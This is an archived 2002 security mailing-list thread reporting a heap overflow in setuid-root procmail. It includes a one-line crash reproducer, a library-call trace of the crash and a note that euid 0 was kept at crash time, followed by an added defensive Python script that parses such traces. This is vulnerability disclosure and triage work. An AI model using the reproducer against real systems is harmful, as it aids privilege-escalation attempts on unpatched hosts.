Re: procmail heap overflow

From: KF (dotslashat_private)
Date: Tue Jun 18 2002 - 21:46:29 PDT


    I believe we (one of our researchers "dvdman") were messing with this a 
    few months back ... we never finished up our research ... here's what I 
    found in an old strace log...
    
    -KF
    
    
    malloc(86)                                        = 0x0805e0c0
    memmove(0x0805e0c4, 0x0805c9c8, 82, 1, 4096)      = 0x0805e0c4
    strchr("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., '=') = "=a"
    setregid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0
    setreuid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0
    setuid(506)                                       = 0
    setegid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0
    strncpy(0x0805c9c8, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 10000) = 0x0805c9c8
    strlen(0x080577b1, 0x40192620, 0xbfffd048, 0x400de1de, 0) = 8
    malloc(81)                                        = 0x0805e120
    memmove(0x0805e120, 0x080577b1, 8, 0x400de1de, 0) = 0x0805e120
    strlen(0x08057d68, 0x080577b1, 8, 0x400de1de, 0)  = 2
    memmove(0x0805e128, 0x08057d68, 2, 0x400de1de, 0) = 0x0805e128
    strlen(0x08057811, 0x08057d68, 2, 0x400de1de, 0)  = 17
    memmove(0x0805e12a, 0x08057811, 17, 0x400de1de, 0) = 0x0805e12a
    write(2, "procmail: Exceeded LINEBUF\n", 27)      = 27
    strchr("PROCMAIL_OVERFLOW=yes", '=')              = "=yes"
    strncmp("PROCMAIL_OVERFLOW=yes", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 17) = 15
    strncmp("PROCMAIL_OVERFLOW=yes", "EOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOF"..., 17 <unfinished ...>
    --- SIGSEGV (Segmentation fault) ---
    +++ killed by SIGSEGV +++
    
    -KF
    
    
    SpaceWalker wrote:
    
    >$ procmail -v
    >procmail v3.15.1 2001/01/08
    >$ procmail `perl -e '{print "A"x10240}'`=A
    >wait indefinitely
    >Doesn't seem to segfault on my system, I'm running base slackware 8 on x86.
    >
    >On Wed, 19 Jun 2002 02:38:08 +0200
    >flatline <flatlineat_private> wrote:
    >
    >>hi,
    >>
    >>i found a heap overflow in procmail (up until latest) some time ago.
    >>
    >>flatline@intra:/usr/bin$ ls -la procmail
    >>-rwsr-xr-x    1 root     mail        64344 Jun  3  2001 procmail*
    >>flatline@intra:/usr/bin$ ./procmail `perl -e '{print "A"x10240}'`=A
    >>procmail: Exceeded LINEBUF
    >>Segmentation fault
    >>flatline@intra:/usr/bin$
    >>
    >>at first it seemed to properly drop privs before segging, but not too long 
    >>ago i managed to make it crash while it still had euid 0.
    >>segfaults have been seen on red hat/slackware linux and bsd variants. 
    >>successful exploitation has not been verified.
    >>
    >>/ flatline
    >>
    >>greets fly out to fc, zeno, xistence, thewolf, #gold, #!xpc and everyone 
    >>who felt left out.
    >>
    >
    >
    
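The trace KF posted is the kind of artifact a responder gets handed when triaging a crash like flatline's: a list of library calls, a 10000-byte bounded copy into a buffer no visible malloc accounts for, a set of set*uid calls, and then a SIGSEGV. The script below is an added illustration written for this page; it is not code from the thread, from procmail, or from any tool named here. It walks an ltrace-style `func(args) = ret` log, keeps a table of malloc'd blocks, flags copies that overrun the block they land in or that are large and land in an untracked buffer, and records whether a uid change succeeded before the first suspicious copy (flatline's "did it drop privs before segging" question). The first trace is the one from the post (long strings stay truncated as "..." exactly as the trace printed them); the second trace, the 4096-byte "large copy" threshold and the function-name sets are assumptions chosen for the example.

```python
import re

# Constructed excerpt modelled on the library-call trace KF posted; addresses
# and sizes are those in the post, long strings stay truncated as "...".
THREAD_TRACE = """\
malloc(86)                                        = 0x0805e0c0
memmove(0x0805e0c4, 0x0805c9c8, 82, 1, 4096)      = 0x0805e0c4
strchr("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., '=') = "=a"
setregid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0
setreuid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0
setuid(506)                                       = 0
setegid(506, -1, 0xbfffd355, 0x08056314, 0xbfffd355) = 0
strncpy(0x0805c9c8, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 10000) = 0x0805c9c8
malloc(81)                                        = 0x0805e120
memmove(0x0805e120, 0x080577b1, 8, 0x400de1de, 0) = 0x0805e120
memmove(0x0805e128, 0x08057d68, 2, 0x400de1de, 0) = 0x0805e128
memmove(0x0805e12a, 0x08057811, 17, 0x400de1de, 0) = 0x0805e12a
write(2, "procmail: Exceeded LINEBUF\\n", 27)      = 27
--- SIGSEGV (Segmentation fault) ---
"""

# Constructed trace (not from the thread): a copy that overruns a tracked heap
# block, with the uid change happening only afterwards.
OVERRUN_TRACE = """\
malloc(16)                                        = 0x0804a000
memcpy(0x0804a004, 0xbfffe000, 32)                = 0x0804a004
setuid(506)                                       = 0
"""

CALL_RE = re.compile(r'^\s*(\w+)\((.*)\)\s*=\s*(\S+)')   # func(args) = ret
SIGNAL_RE = re.compile(r'^\s*---\s+(SIG\w+)')            # --- SIGSEGV (...) ---
COPY_FUNCS = {"memcpy", "memmove", "strncpy", "strcpy"}  # assumed set of copy calls
PRIV_FUNCS = {"setuid", "seteuid", "setreuid", "setresuid"}  # uid changes only
LARGE_COPY = 4096  # assumed threshold: bounded copies this big into unknown buffers get reported


def split_args(s):
    """Split a trace argument list on commas that are outside quoted strings."""
    args, cur, quote, i = [], [], None, 0
    while i < len(s):
        c = s[i]
        if quote:
            cur.append(c)
            if c == '\\' and i + 1 < len(s):   # keep escaped char with its backslash
                cur.append(s[i + 1])
                i += 1
            elif c == quote:
                quote = None
        elif c in '"\'':
            quote = c
            cur.append(c)
        elif c == ',':
            args.append(''.join(cur).strip())
            cur = []
        else:
            cur.append(c)
        i += 1
    if cur:
        args.append(''.join(cur).strip())
    return args


def to_int(tok):
    """Decimal or hex trace argument as int; None for strings and other tokens."""
    try:
        return int(tok.rstrip('.'), 0)   # drop the "..." truncation marker first
    except ValueError:
        return None


def check_copy(func, dst, n, allocs):
    """Classify one copy call against the malloc table; None when it looks fine."""
    if dst is None:
        return None
    if func == "strcpy" or n is None:
        return {"kind": "unbounded_copy", "func": func, "dst": dst}
    for base, size in allocs.items():
        if base <= dst < base + size:
            room = base + size - dst          # bytes left in the block from dst
            if n > room:
                return {"kind": "heap_overrun", "func": func, "dst": dst,
                        "n": n, "room": room, "block": base}
            return None
    if n >= LARGE_COPY:
        return {"kind": "large_copy_untracked", "func": func, "dst": dst, "n": n}
    return None


def analyze(trace):
    """Walk a trace and return allocations, suspicious copies, crash signal and uid-drop ordering."""
    allocs, findings = {}, []
    priv_dropped_at = first_finding_at = signal = None
    for lineno, line in enumerate(trace.splitlines(), 1):
        m = SIGNAL_RE.match(line)
        if m:
            signal = m.group(1)
            continue
        m = CALL_RE.match(line)
        if not m:
            continue
        func, ret = m.group(1), m.group(3)
        nums = [to_int(a) for a in split_args(m.group(2))]
        if func == "malloc" and nums and nums[0] is not None and ret.startswith("0x"):
            allocs[int(ret, 16)] = nums[0]
        elif func in PRIV_FUNCS and ret == "0" and priv_dropped_at is None:
            priv_dropped_at = lineno          # first successful uid change
        elif func in COPY_FUNCS:
            n = nums[2] if len(nums) > 2 else None
            finding = check_copy(func, nums[0], n, allocs)
            if finding:
                finding["line"] = lineno
                findings.append(finding)
                first_finding_at = first_finding_at or lineno
    return {
        "allocations": allocs,
        "findings": findings,
        "signal": signal,
        "privs_dropped_before_first_finding": (
            priv_dropped_at is not None and first_finding_at is not None
            and priv_dropped_at < first_finding_at),
    }


if __name__ == "__main__":
    for name, trace in (("thread trace", THREAD_TRACE), ("constructed overrun", OVERRUN_TRACE)):
        r = analyze(trace)
        print(f"== {name}: signal={r['signal']}, "
              f"uid dropped before first finding={r['privs_dropped_before_first_finding']}")
        for f in r["findings"]:
            print(f"  line {f['line']}: {f['kind']} via {f['func']} -> 0x{f['dst']:08x} "
                  f"n={f.get('n')} room={f.get('room')}")
```

On the posted trace the 82-byte memmove fits its 86-byte block exactly (the destination sits 4 bytes in), the strncpy with a 10000-byte bound goes to an address no malloc in the trace accounts for and is reported as a large copy into an untracked buffer, and the uid change precedes it, which matches flatline's first observation; whether the buffer is a static LINEBUF or an earlier heap block is something the trace alone cannot settle, so the script reports rather than asserts.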



    This archive was generated by hypermail 2b30 : Wed Jun 19 2002 - 11:16:31 PDT